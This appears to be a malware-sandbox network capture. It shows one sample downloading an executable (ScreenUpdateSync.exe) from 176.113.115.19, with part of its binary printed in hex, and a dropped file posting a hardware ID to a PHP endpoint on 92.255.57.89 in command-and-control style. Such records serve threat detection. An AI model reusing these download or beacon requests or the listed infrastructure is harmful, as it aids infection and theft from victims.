                                                    Dec 10, 2024 17:42:10.022659063 CET4970080192.168.2.7176.113.115.19
                                                    Dec 10, 2024 17:42:10.024867058 CET8049700176.113.115.19192.168.2.7
                                                    Dec 10, 2024 17:42:10.024936914 CET4970080192.168.2.7176.113.115.19
                                                    Dec 10, 2024 17:42:10.025005102 CET8049700176.113.115.19192.168.2.7
                                                    Dec 10, 2024 17:42:10.025052071 CET4970080192.168.2.7176.113.115.19
                                                    Dec 10, 2024 17:42:10.027443886 CET8049700176.113.115.19192.168.2.7
                                                    Dec 10, 2024 17:42:10.027554989 CET8049700176.113.115.19192.168.2.7
                                                    Dec 10, 2024 17:42:10.027631998 CET4970080192.168.2.7176.113.115.19
                                                    Dec 10, 2024 17:42:10.029946089 CET8049700176.113.115.19192.168.2.7
                                                    Dec 10, 2024 17:42:10.030086040 CET8049700176.113.115.19192.168.2.7
                                                    Dec 10, 2024 17:42:10.030206919 CET4970080192.168.2.7176.113.115.19
                                                    Dec 10, 2024 17:42:10.032490015 CET8049700176.113.115.19192.168.2.7
                                                    Dec 10, 2024 17:42:10.032602072 CET8049700176.113.115.19192.168.2.7
                                                    Dec 10, 2024 17:42:10.032636881 CET4970080192.168.2.7176.113.115.19
                                                    Dec 10, 2024 17:42:10.032685995 CET4970080192.168.2.7176.113.115.19
                                                    Dec 10, 2024 17:42:10.035031080 CET8049700176.113.115.19192.168.2.7
                                                    Dec 10, 2024 17:42:10.035130978 CET8049700176.113.115.19192.168.2.7
                                                    Dec 10, 2024 17:42:10.035224915 CET4970080192.168.2.7176.113.115.19
                                                    Dec 10, 2024 17:42:10.037620068 CET8049700176.113.115.19192.168.2.7
                                                    Dec 10, 2024 17:42:10.037750006 CET8049700176.113.115.19192.168.2.7
                                                    Dec 10, 2024 17:42:10.037811041 CET4970080192.168.2.7176.113.115.19
                                                    Dec 10, 2024 17:42:10.040086985 CET8049700176.113.115.19192.168.2.7
                                                    Dec 10, 2024 17:42:10.040148020 CET4970080192.168.2.7176.113.115.19
                                                    Dec 10, 2024 17:42:10.040214062 CET8049700176.113.115.19192.168.2.7
                                                    Dec 10, 2024 17:42:10.040266991 CET4970080192.168.2.7176.113.115.19
                                                    Dec 10, 2024 17:42:10.042697906 CET8049700176.113.115.19192.168.2.7
                                                    Dec 10, 2024 17:42:10.042782068 CET8049700176.113.115.19192.168.2.7
                                                    Dec 10, 2024 17:42:10.042885065 CET4970080192.168.2.7176.113.115.19
                                                    Dec 10, 2024 17:42:10.045084000 CET8049700176.113.115.19192.168.2.7
                                                    Dec 10, 2024 17:42:10.045156002 CET4970080192.168.2.7176.113.115.19
                                                    Dec 10, 2024 17:42:10.045227051 CET8049700176.113.115.19192.168.2.7
                                                    Dec 10, 2024 17:42:10.045284986 CET4970080192.168.2.7176.113.115.19
                                                    Dec 10, 2024 17:42:10.047739983 CET8049700176.113.115.19192.168.2.7
                                                    Dec 10, 2024 17:42:10.048031092 CET8049700176.113.115.19192.168.2.7
                                                    Dec 10, 2024 17:42:10.048095942 CET4970080192.168.2.7176.113.115.19
                                                    Dec 10, 2024 17:42:10.050167084 CET8049700176.113.115.19192.168.2.7
                                                    Dec 10, 2024 17:42:10.050340891 CET8049700176.113.115.19192.168.2.7
                                                    Dec 10, 2024 17:42:10.050404072 CET4970080192.168.2.7176.113.115.19
                                                    Dec 10, 2024 17:42:10.052750111 CET8049700176.113.115.19192.168.2.7
                                                    Dec 10, 2024 17:42:10.052819014 CET4970080192.168.2.7176.113.115.19
                                                    Dec 10, 2024 17:42:10.052928925 CET8049700176.113.115.19192.168.2.7
                                                    Dec 10, 2024 17:42:10.052984953 CET4970080192.168.2.7176.113.115.19
                                                    Dec 10, 2024 17:42:10.055329084 CET8049700176.113.115.19192.168.2.7
                                                    Dec 10, 2024 17:42:10.055524111 CET8049700176.113.115.19192.168.2.7
                                                    Dec 10, 2024 17:42:10.055581093 CET4970080192.168.2.7176.113.115.19
                                                    Dec 10, 2024 17:42:10.057810068 CET8049700176.113.115.19192.168.2.7
                                                    Dec 10, 2024 17:42:10.057857037 CET8049700176.113.115.19192.168.2.7
                                                    Dec 10, 2024 17:42:10.057919979 CET4970080192.168.2.7176.113.115.19
                                                    Dec 10, 2024 17:42:10.060287952 CET8049700176.113.115.19192.168.2.7
                                                    Dec 10, 2024 17:42:10.060348988 CET4970080192.168.2.7176.113.115.19
                                                    Dec 10, 2024 17:42:10.060384035 CET8049700176.113.115.19192.168.2.7
                                                    Dec 10, 2024 17:42:10.060461044 CET4970080192.168.2.7176.113.115.19
                                                    Dec 10, 2024 17:42:10.062792063 CET8049700176.113.115.19192.168.2.7
                                                    Dec 10, 2024 17:42:10.062880993 CET4970080192.168.2.7176.113.115.19
                                                    Dec 10, 2024 17:42:10.062902927 CET8049700176.113.115.19192.168.2.7
                                                    Dec 10, 2024 17:42:10.062951088 CET4970080192.168.2.7176.113.115.19
                                                    Dec 10, 2024 17:42:10.065315962 CET8049700176.113.115.19192.168.2.7
                                                    Dec 10, 2024 17:42:10.065366030 CET4970080192.168.2.7176.113.115.19
                                                    Dec 10, 2024 17:42:10.065557957 CET8049700176.113.115.19192.168.2.7
                                                    Dec 10, 2024 17:42:10.065748930 CET4970080192.168.2.7176.113.115.19
                                                    Dec 10, 2024 17:42:10.068079948 CET8049700176.113.115.19192.168.2.7
                                                    Dec 10, 2024 17:42:10.068224907 CET8049700176.113.115.19192.168.2.7
                                                    Dec 10, 2024 17:42:10.068286896 CET4970080192.168.2.7176.113.115.19
                                                    Dec 10, 2024 17:42:10.070332050 CET8049700176.113.115.19192.168.2.7
                                                    Dec 10, 2024 17:42:10.070386887 CET4970080192.168.2.7176.113.115.19
                                                    Dec 10, 2024 17:42:10.070560932 CET8049700176.113.115.19192.168.2.7
                                                    Dec 10, 2024 17:42:10.070611000 CET4970080192.168.2.7176.113.115.19
                                                    Dec 10, 2024 17:42:10.072871923 CET8049700176.113.115.19192.168.2.7
                                                    Dec 10, 2024 17:42:10.072946072 CET8049700176.113.115.19192.168.2.7
                                                    Dec 10, 2024 17:42:10.072999001 CET4970080192.168.2.7176.113.115.19
                                                    Dec 10, 2024 17:42:10.075439930 CET8049700176.113.115.19192.168.2.7
                                                    Dec 10, 2024 17:42:10.075725079 CET8049700176.113.115.19192.168.2.7
                                                    Dec 10, 2024 17:42:10.075783968 CET4970080192.168.2.7176.113.115.19
                                                    Dec 10, 2024 17:42:10.078109980 CET8049700176.113.115.19192.168.2.7
                                                    Dec 10, 2024 17:42:10.078284979 CET8049700176.113.115.19192.168.2.7
                                                    Dec 10, 2024 17:42:10.078345060 CET4970080192.168.2.7176.113.115.19
                                                    Dec 10, 2024 17:42:10.080519915 CET8049700176.113.115.19192.168.2.7
                                                    Dec 10, 2024 17:42:10.080579042 CET4970080192.168.2.7176.113.115.19
                                                    Dec 10, 2024 17:42:10.080605030 CET8049700176.113.115.19192.168.2.7
                                                    Dec 10, 2024 17:42:10.080699921 CET4970080192.168.2.7176.113.115.19
                                                    Dec 10, 2024 17:42:10.083002090 CET8049700176.113.115.19192.168.2.7
                                                    Dec 10, 2024 17:42:10.083117008 CET8049700176.113.115.19192.168.2.7
                                                    Dec 10, 2024 17:42:10.083170891 CET4970080192.168.2.7176.113.115.19
                                                    Dec 10, 2024 17:42:10.085546017 CET8049700176.113.115.19192.168.2.7
                                                    Dec 10, 2024 17:42:10.085685015 CET8049700176.113.115.19192.168.2.7
                                                    Dec 10, 2024 17:42:10.085748911 CET4970080192.168.2.7176.113.115.19
                                                    Dec 10, 2024 17:42:10.088332891 CET8049700176.113.115.19192.168.2.7
                                                    Dec 10, 2024 17:42:10.088392019 CET4970080192.168.2.7176.113.115.19
                                                    Dec 10, 2024 17:42:10.088412046 CET8049700176.113.115.19192.168.2.7
                                                    Dec 10, 2024 17:42:10.088464022 CET4970080192.168.2.7176.113.115.19
                                                    Dec 10, 2024 17:42:10.091097116 CET8049700176.113.115.19192.168.2.7
                                                    Dec 10, 2024 17:42:10.091170073 CET8049700176.113.115.19192.168.2.7
                                                    Dec 10, 2024 17:42:10.091195107 CET4970080192.168.2.7176.113.115.19
                                                    Dec 10, 2024 17:42:10.091212034 CET4970080192.168.2.7176.113.115.19
                                                    Dec 10, 2024 17:42:10.093920946 CET8049700176.113.115.19192.168.2.7
                                                    Dec 10, 2024 17:42:10.094010115 CET8049700176.113.115.19192.168.2.7
                                                    Dec 10, 2024 17:42:10.094059944 CET4970080192.168.2.7176.113.115.19
                                                    Dec 10, 2024 17:42:10.096257925 CET8049700176.113.115.19192.168.2.7
                                                    Dec 10, 2024 17:42:10.096379995 CET8049700176.113.115.19192.168.2.7
                                                    Dec 10, 2024 17:42:10.096415997 CET4970080192.168.2.7176.113.115.19
                                                    Dec 10, 2024 17:42:10.096518040 CET4970080192.168.2.7176.113.115.19
                                                    Dec 10, 2024 17:42:10.100716114 CET8049700176.113.115.19192.168.2.7
                                                    Dec 10, 2024 17:42:10.101195097 CET8049700176.113.115.19192.168.2.7
                                                    Dec 10, 2024 17:42:10.101253986 CET4970080192.168.2.7176.113.115.19
                                                    Dec 10, 2024 17:42:10.101317883 CET8049700176.113.115.19192.168.2.7
                                                    Dec 10, 2024 17:42:10.101386070 CET4970080192.168.2.7176.113.115.19
                                                    Dec 10, 2024 17:42:10.101418972 CET8049700176.113.115.19192.168.2.7
                                                    Dec 10, 2024 17:42:10.104362965 CET4970080192.168.2.7176.113.115.19
                                                    Dec 10, 2024 17:42:10.104518890 CET8049700176.113.115.19192.168.2.7
                                                    Dec 10, 2024 17:42:10.104574919 CET4970080192.168.2.7176.113.115.19
                                                    Dec 10, 2024 17:42:10.183060884 CET8049700176.113.115.19192.168.2.7
                                                    Dec 10, 2024 17:42:10.183129072 CET4970080192.168.2.7176.113.115.19
                                                    Dec 10, 2024 17:42:10.183233023 CET8049700176.113.115.19192.168.2.7
                                                    Dec 10, 2024 17:42:10.183289051 CET4970080192.168.2.7176.113.115.19
                                                    Dec 10, 2024 17:42:10.183810949 CET8049700176.113.115.19192.168.2.7
                                                    Dec 10, 2024 17:42:10.183864117 CET4970080192.168.2.7176.113.115.19
                                                    Dec 10, 2024 17:42:10.183895111 CET8049700176.113.115.19192.168.2.7
                                                    Dec 10, 2024 17:42:10.183942080 CET4970080192.168.2.7176.113.115.19
                                                    Dec 10, 2024 17:42:10.185692072 CET8049700176.113.115.19192.168.2.7
                                                    Dec 10, 2024 17:42:10.185705900 CET8049700176.113.115.19192.168.2.7
                                                    Dec 10, 2024 17:42:10.185744047 CET4970080192.168.2.7176.113.115.19
                                                    Dec 10, 2024 17:42:10.185786009 CET4970080192.168.2.7176.113.115.19
                                                    Dec 10, 2024 17:42:10.187798023 CET8049700176.113.115.19192.168.2.7
                                                    Dec 10, 2024 17:42:10.187843084 CET4970080192.168.2.7176.113.115.19
                                                    Dec 10, 2024 17:42:10.188007116 CET8049700176.113.115.19192.168.2.7
                                                    Dec 10, 2024 17:42:10.188122034 CET4970080192.168.2.7176.113.115.19
                                                    Dec 10, 2024 17:42:10.190099001 CET8049700176.113.115.19192.168.2.7
                                                    Dec 10, 2024 17:42:10.190145016 CET4970080192.168.2.7176.113.115.19
                                                    Dec 10, 2024 17:42:10.190188885 CET8049700176.113.115.19192.168.2.7
                                                    Dec 10, 2024 17:42:10.190244913 CET4970080192.168.2.7176.113.115.19
                                                    Dec 10, 2024 17:42:10.192240000 CET8049700176.113.115.19192.168.2.7
                                                    Dec 10, 2024 17:42:10.192297935 CET4970080192.168.2.7176.113.115.19
                                                    Dec 10, 2024 17:42:10.192351103 CET8049700176.113.115.19192.168.2.7
                                                    Dec 10, 2024 17:42:10.192397118 CET4970080192.168.2.7176.113.115.19
                                                    Dec 10, 2024 17:42:10.194432974 CET8049700176.113.115.19192.168.2.7
                                                    Dec 10, 2024 17:42:10.194483995 CET4970080192.168.2.7176.113.115.19
                                                    Dec 10, 2024 17:42:10.194513083 CET8049700176.113.115.19192.168.2.7
                                                    Dec 10, 2024 17:42:10.194559097 CET4970080192.168.2.7176.113.115.19
                                                    Dec 10, 2024 17:42:10.196547031 CET8049700176.113.115.19192.168.2.7
                                                    Dec 10, 2024 17:42:10.196598053 CET4970080192.168.2.7176.113.115.19
                                                    Dec 10, 2024 17:42:10.196647882 CET8049700176.113.115.19192.168.2.7
                                                    Dec 10, 2024 17:42:10.196748972 CET4970080192.168.2.7176.113.115.19
                                                    Dec 10, 2024 17:42:10.198992968 CET8049700176.113.115.19192.168.2.7
                                                    Dec 10, 2024 17:42:10.199039936 CET4970080192.168.2.7176.113.115.19
                                                    Dec 10, 2024 17:42:10.199057102 CET8049700176.113.115.19192.168.2.7
                                                    Dec 10, 2024 17:42:10.199099064 CET4970080192.168.2.7176.113.115.19
                                                    Dec 10, 2024 17:42:10.200809956 CET8049700176.113.115.19192.168.2.7
                                                    Dec 10, 2024 17:42:10.200875044 CET4970080192.168.2.7176.113.115.19
                                                    Dec 10, 2024 17:42:10.200908899 CET8049700176.113.115.19192.168.2.7
                                                    Dec 10, 2024 17:42:10.200949907 CET4970080192.168.2.7176.113.115.19
                                                    Dec 10, 2024 17:42:10.202804089 CET8049700176.113.115.19192.168.2.7
                                                    Dec 10, 2024 17:42:10.202867985 CET4970080192.168.2.7176.113.115.19
                                                    Dec 10, 2024 17:42:10.202907085 CET8049700176.113.115.19192.168.2.7
                                                    Dec 10, 2024 17:42:10.202958107 CET4970080192.168.2.7176.113.115.19
                                                    Dec 10, 2024 17:42:10.204989910 CET8049700176.113.115.19192.168.2.7
                                                    Dec 10, 2024 17:42:10.205003023 CET8049700176.113.115.19192.168.2.7
                                                    Dec 10, 2024 17:42:10.205071926 CET4970080192.168.2.7176.113.115.19
                                                    Dec 10, 2024 17:42:10.205085993 CET4970080192.168.2.7176.113.115.19
                                                    Dec 10, 2024 17:42:10.207077980 CET8049700176.113.115.19192.168.2.7
                                                    Dec 10, 2024 17:42:10.207144022 CET4970080192.168.2.7176.113.115.19
                                                    Dec 10, 2024 17:42:10.207180977 CET8049700176.113.115.19192.168.2.7
                                                    Dec 10, 2024 17:42:10.207226038 CET4970080192.168.2.7176.113.115.19
                                                    Dec 10, 2024 17:42:10.208877087 CET8049700176.113.115.19192.168.2.7
                                                    Dec 10, 2024 17:42:10.208944082 CET4970080192.168.2.7176.113.115.19
                                                    Dec 10, 2024 17:42:10.209067106 CET8049700176.113.115.19192.168.2.7
                                                    Dec 10, 2024 17:42:10.209150076 CET4970080192.168.2.7176.113.115.19
                                                    Dec 10, 2024 17:42:10.211273909 CET8049700176.113.115.19192.168.2.7
                                                    Dec 10, 2024 17:42:10.211286068 CET8049700176.113.115.19192.168.2.7
                                                    Dec 10, 2024 17:42:10.211328983 CET4970080192.168.2.7176.113.115.19
                                                    Dec 10, 2024 17:42:10.213149071 CET8049700176.113.115.19192.168.2.7
                                                    Dec 10, 2024 17:42:10.213198900 CET8049700176.113.115.19192.168.2.7
                                                    Dec 10, 2024 17:42:10.213212013 CET4970080192.168.2.7176.113.115.19
                                                    Dec 10, 2024 17:42:10.213248014 CET4970080192.168.2.7176.113.115.19
                                                    Dec 10, 2024 17:42:10.214864969 CET8049700176.113.115.19192.168.2.7
                                                    Dec 10, 2024 17:42:10.214935064 CET4970080192.168.2.7176.113.115.19
                                                    Dec 10, 2024 17:42:10.214967966 CET8049700176.113.115.19192.168.2.7
                                                    Dec 10, 2024 17:42:10.215014935 CET4970080192.168.2.7176.113.115.19
                                                    Dec 10, 2024 17:42:10.216690063 CET8049700176.113.115.19192.168.2.7
                                                    Dec 10, 2024 17:42:10.216758966 CET4970080192.168.2.7176.113.115.19
                                                    Dec 10, 2024 17:42:12.538456917 CET4970280192.168.2.792.255.57.89
                                                    Dec 10, 2024 17:42:12.658174992 CET804970292.255.57.89192.168.2.7
                                                    Dec 10, 2024 17:42:12.661572933 CET4970280192.168.2.792.255.57.89
                                                    Dec 10, 2024 17:42:12.714642048 CET4970280192.168.2.792.255.57.89
                                                    Dec 10, 2024 17:42:12.834264994 CET804970292.255.57.89192.168.2.7
                                                    Dec 10, 2024 17:42:14.042779922 CET804970292.255.57.89192.168.2.7
                                                    Dec 10, 2024 17:42:14.042840958 CET4970280192.168.2.792.255.57.89
                                                    Dec 10, 2024 17:42:14.045897961 CET4970280192.168.2.792.255.57.89
                                                    Dec 10, 2024 17:42:14.165561914 CET804970292.255.57.89192.168.2.7
                                                    Dec 10, 2024 17:42:14.464345932 CET8049700176.113.115.19192.168.2.7
                                                    Dec 10, 2024 17:42:14.464432955 CET4970080192.168.2.7176.113.115.19
                                                    Dec 10, 2024 17:42:14.485032082 CET804970292.255.57.89192.168.2.7
                                                    Dec 10, 2024 17:42:14.485106945 CET4970280192.168.2.792.255.57.89
                                                    Dec 10, 2024 17:42:19.485518932 CET804970292.255.57.89192.168.2.7
                                                    Dec 10, 2024 17:42:19.485583067 CET4970280192.168.2.792.255.57.89
                                                    Dec 10, 2024 17:43:14.335665941 CET4970280192.168.2.792.255.57.89
                                                    Dec 10, 2024 17:43:55.197094917 CET4970080192.168.2.7176.113.115.19
                                                    Dec 10, 2024 17:43:55.509567976 CET4970080192.168.2.7176.113.115.19
                                                    Dec 10, 2024 17:43:56.118874073 CET4970080192.168.2.7176.113.115.19
                                                    Dec 10, 2024 17:43:57.321996927 CET4970080192.168.2.7176.113.115.19
                                                    Dec 10, 2024 17:43:59.728235006 CET4970080192.168.2.7176.113.115.19
                                                    Dec 10, 2024 17:44:04.541654110 CET4970080192.168.2.7176.113.115.19
                                                    Dec 10, 2024 17:44:14.150585890 CET4970080192.168.2.7176.113.115.19
                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Dec 10, 2024 17:42:05.215326071 CET5252653192.168.2.71.1.1.1
                                                    Dec 10, 2024 17:42:05.561398983 CET53525261.1.1.1192.168.2.7
                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                    Dec 10, 2024 17:42:05.215326071 CET192.168.2.71.1.1.10x9337Standard query (0)post-to-me.comA (IP address)IN (0x0001)false
                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                    Dec 10, 2024 17:42:05.561398983 CET1.1.1.1192.168.2.70x9337No error (0)post-to-me.com104.21.56.70A (IP address)IN (0x0001)false
                                                    Dec 10, 2024 17:42:05.561398983 CET1.1.1.1192.168.2.70x9337No error (0)post-to-me.com172.67.179.207A (IP address)IN (0x0001)false
                                                    • post-to-me.com
                                                    • 176.113.115.19
                                                    • 92.255.57.89
                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    0192.168.2.749700176.113.115.19803076C:\Users\user\Desktop\ief722WreR.exe
                                                    TimestampBytes transferredDirectionData
                                                    Dec 10, 2024 17:42:07.867661953 CET85OUTGET /ScreenUpdateSync.exe HTTP/1.1
                                                    User-Agent: ShareScreen
                                                    Host: 176.113.115.19
                                                    Dec 10, 2024 17:42:09.220897913 CET1236INHTTP/1.1 200 OK
                                                    Date: Tue, 10 Dec 2024 16:42:09 GMT
                                                    Server: Apache/2.4.41 (Ubuntu)
                                                    Last-Modified: Tue, 10 Dec 2024 16:30:01 GMT
                                                    ETag: "4a000-628ecfe24ce67"
                                                    Accept-Ranges: bytes
                                                    Content-Length: 303104
                                                    Content-Type: application/x-msdos-program
                                                    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 59 67 15 b8 1d 06 7b eb 1d 06 7b eb 1d 06 7b eb 03 54 ff eb 01 06 7b eb 03 54 ee eb 09 06 7b eb 03 54 f8 eb 45 06 7b eb 3a c0 00 eb 1a 06 7b eb 1d 06 7a eb 74 06 7b eb 03 54 f1 eb 1c 06 7b eb 03 54 ef eb 1c 06 7b eb 03 54 ea eb 1c 06 7b eb 52 69 63 68 1d 06 7b eb 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 3d 89 df 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 f0 02 00 00 1e 3f 00 00 00 00 00 f7 14 00 00 00 10 00 00 00 00 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 10 42 00 00 04 00 00 17 1a 05 00 02 00 00 80 00 00 [TRUNCATED]
                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$Yg{{{T{T{TE{:{zt{T{T{T{Rich{PEL=d?@B4<@`.text `.rdataL "@@.data=0l@.rsrc@@@
                                                    Dec 10, 2024 17:42:09.221033096 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff 25 1c 00 43 00 3b 0d 04 30 43 00 75 02 f3 c3 e9 ec 04 00 00 6a 0c 68 80 15 43 00 e8 df 12 00 00 8b 75 08 85 f6 74 75 83 3d
                                                    Data Ascii: %C;0CujhCutu=uCjYeVYEtVPYYE}u7ujYVj5ZCCuCPmYUQeVEPuu/u9Et
                                                    Dec 10, 2024 17:42:09.221045971 CET1236INData Raw: 4d dc 50 51 e8 f9 20 00 00 59 59 c3 8b 65 e8 8b 45 dc 89 45 e0 83 7d e4 00 75 06 50 e8 f3 13 00 00 e8 13 14 00 00 c7 45 fc fe ff ff ff 8b 45 e0 eb 13 33 c0 40 c3 8b 65 e8 c7 45 fc fe ff ff ff b8 ff 00 00 00 e8 4f 0e 00 00 c3 e8 7b 29 00 00 e9 78
                                                    Data Ascii: MPQ YYeEE}uPEE3@eEO{)xU(xXCtXCpXClXC5hXC=dXCfXCfXCf`XCf\XCf%XXCf-TXCXCE|XCEXCEXCWCXC|WCpWCt
                                                    Dec 10, 2024 17:42:09.221437931 CET1236INData Raw: 5e 8b 4d 0c 8b 71 04 3b 71 08 75 3b be 00 00 00 80 83 fb 20 73 17 8b cb d3 ee f7 d6 21 74 b8 44 fe 4c 03 04 75 21 8b 4d 08 21 31 eb 1a 8d 4b e0 d3 ee f7 d6 21 b4 b8 c4 00 00 00 fe 4c 03 04 75 06 8b 4d 08 21 71 04 8b 4d 0c 8b 71 08 8b 49 04 89 4e
                                                    Data Ascii: ^Mq;qu; s!tDLu!M!1K!LuM!qMqINMqINu]}u;MYN^qNqN;Nu`LML s%}uMDD)}uJMYJ
                                                    Dec 10, 2024 17:42:09.221450090 CET1236INData Raw: 59 04 3b 59 08 75 57 8a 4c 07 04 88 4d 13 fe c1 88 4c 07 04 83 ff 20 73 1c 80 7d 13 00 75 0e 8b cf bb 00 00 00 80 d3 eb 8b 4d 08 09 19 8d 44 90 44 8b cf eb 20 80 7d 13 00 75 10 8d 4f e0 bb 00 00 00 80 d3 eb 8b 4d 08 09 59 04 8d 84 90 c4 00 00 00
                                                    Data Ascii: Y;YuWLML s}uMDD }uOMYOUMD2LUFBD2<38/])uNK\3uN]K?vj?^EuN?vj?^O;OuB st!\Du#M
                                                    Dec 10, 2024 17:42:09.221462965 CET1120INData Raw: 89 65 e8 ff 75 f8 8b 45 fc c7 45 fc fe ff ff ff 89 45 f8 8d 45 f0 64 a3 00 00 00 00 c3 8b 4d f0 64 89 0d 00 00 00 00 59 5f 5f 5e 5b 8b e5 5d 51 c3 cc cc cc cc cc cc cc 8b ff 55 8b ec 83 ec 18 53 8b 5d 0c 56 8b 73 08 33 35 04 30 43 00 57 8b 06 c6
                                                    Data Ascii: euEEEEdMdY__^[]QUS]Vs350CWEE{tN38mNF38]E@fMUS[EMt_I[LDEEt\!E|@GEu}t$tN38
                                                    Dec 10, 2024 17:42:09.221983910 CET1236INData Raw: ff ff 6a 08 e8 77 f0 ff ff 59 83 65 fc 00 33 db 43 39 1d 1c 5c 43 00 0f 84 c5 00 00 00 89 1d 18 5c 43 00 8a 45 10 a2 14 5c 43 00 83 7d 0c 00 0f 85 9d 00 00 00 ff 35 a8 90 80 00 e8 10 04 00 00 59 8b f8 89 7d d8 85 ff 74 78 ff 35 a4 90 80 00 e8 fb
                                                    Data Ascii: jwYe3C9\C\CE\C}5Y}tx5Yu}uu;rW9t;rJ6559}u9Et}}Eu}hCC_YhCCOYE}u
                                                    Dec 10, 2024 17:42:09.222048044 CET1236INData Raw: ff 15 e8 00 43 00 8b f0 85 f6 75 1b ff 35 40 5f 43 00 e8 65 ff ff ff 59 8b f0 56 ff 35 6c 33 43 00 ff 15 f0 00 43 00 8b c6 5e c3 a1 68 33 43 00 83 f8 ff 74 16 50 ff 35 48 5f 43 00 e8 3b ff ff ff 59 ff d0 83 0d 68 33 43 00 ff a1 6c 33 43 00 83 f8
                                                    Data Ascii: Cu5@_CeYV5l3CC^h3CtP5H_C;Yh3Cl3CtPCl3CjhhC0CV,CuV$YEuF\C3G~t$hCPXChCu~pCKCFh4CjYevhC
                                                    Dec 10, 2024 17:42:09.222060919 CET1236INData Raw: c8 ff 8b f0 83 f8 ff 75 ca 8b c7 5f 5e 5d c3 8b ff 55 8b ec 56 57 33 f6 6a 00 ff 75 0c ff 75 08 e8 97 f3 ff ff 8b f8 83 c4 0c 85 ff 75 27 39 05 4c 5f 43 00 76 1f 56 ff 15 d4 00 43 00 8d 86 e8 03 00 00 3b 05 4c 5f 43 00 76 03 83 c8 ff 8b f0 83 f8
                                                    Data Ascii: u_^]UVW3juuu'9L_CvVC;L_Cvu_^]UVW3uuW&YYu,9Et'9L_CvVC;L_Cvu_^]jhC3]3;;uOWWWWWBS=u8jY
                                                    Dec 10, 2024 17:42:09.222074032 CET1236INData Raw: db 75 07 33 c0 e9 fb 00 00 00 83 fb 05 75 0c 83 60 08 00 33 c0 40 e9 ea 00 00 00 83 fb 01 0f 84 de 00 00 00 8b 4e 60 89 4d f8 8b 4d 0c 89 4e 60 8b 48 04 83 f9 08 0f 85 b8 00 00 00 8b 0d 70 33 43 00 8b 3d 74 33 43 00 8b d1 03 f9 3b d7 7d 24 6b c9
                                                    Data Ascii: u3u`3@N`MMN`Hp3C=t3C;}$k~\d9=p3Ct3CB;|]~d=uFd^=uFdN=uFd>=uFd.=uFd=uFd=uFdvdjY~d
                                                    Dec 10, 2024 17:42:09.340455055 CET1236INData Raw: 83 f8 78 75 0a 6a 02 58 a3 58 60 43 00 eb 05 a1 58 60 43 00 83 f8 01 0f 85 81 00 00 00 3b fb 75 0f ff d6 8b f8 3b fb 75 07 33 c0 e9 ca 00 00 00 8b c7 66 39 1f 74 0e 40 40 66 39 18 75 f9 40 40 66 39 18 75 f2 8b 35 08 01 43 00 53 53 53 2b c7 53 d1
                                                    Data Ascii: xujXX`CX`C;u;u3f9t@@f9u@@f9u5CSSS+S@PWSSEE;t/PYE;t!SSuPuWSSuuY]]WC\t;u4C;r8t@8u@8u+@PEQY;uVCEuVWJ V


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    1192.168.2.74970292.255.57.8980564C:\Users\user\AppData\Local\Temp\DADE.tmp.exe
                                                    TimestampBytes transferredDirectionData
                                                    Dec 10, 2024 17:42:12.714642048 CET87OUTGET / HTTP/1.1
                                                    Host: 92.255.57.89
                                                    Connection: Keep-Alive
                                                    Cache-Control: no-cache
                                                    Dec 10, 2024 17:42:14.042779922 CET203INHTTP/1.1 200 OK
                                                    Date: Tue, 10 Dec 2024 16:42:13 GMT
                                                    Server: Apache/2.4.58 (Ubuntu)
                                                    Content-Length: 0
                                                    Keep-Alive: timeout=5, max=100
                                                    Connection: Keep-Alive
                                                    Content-Type: text/html; charset=UTF-8
                                                    Dec 10, 2024 17:42:14.045897961 CET412OUTPOST /45c616e921a794b8.php HTTP/1.1
                                                    Content-Type: multipart/form-data; boundary=----DGIJECGDGCBKECAKFBGC
                                                    Host: 92.255.57.89
                                                    Content-Length: 213
                                                    Connection: Keep-Alive
                                                    Cache-Control: no-cache
                                                    Data Raw: 2d 2d 2d 2d 2d 2d 44 47 49 4a 45 43 47 44 47 43 42 4b 45 43 41 4b 46 42 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 30 44 41 38 38 32 30 43 34 30 46 38 30 37 36 35 36 36 31 35 0d 0a 2d 2d 2d 2d 2d 2d 44 47 49 4a 45 43 47 44 47 43 42 4b 45 43 41 4b 46 42 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 0d 0a 2d 2d 2d 2d 2d 2d 44 47 49 4a 45 43 47 44 47 43 42 4b 45 43 41 4b 46 42 47 43 2d 2d 0d 0a
                                                    Data Ascii: ------DGIJECGDGCBKECAKFBGCContent-Disposition: form-data; name="hwid"C0DA8820C40F807656615------DGIJECGDGCBKECAKFBGCContent-Disposition: form-data; name="build"default------DGIJECGDGCBKECAKFBGC--
                                                    Dec 10, 2024 17:42:14.485032082 CET210INHTTP/1.1 200 OK
                                                    Date: Tue, 10 Dec 2024 16:42:14 GMT
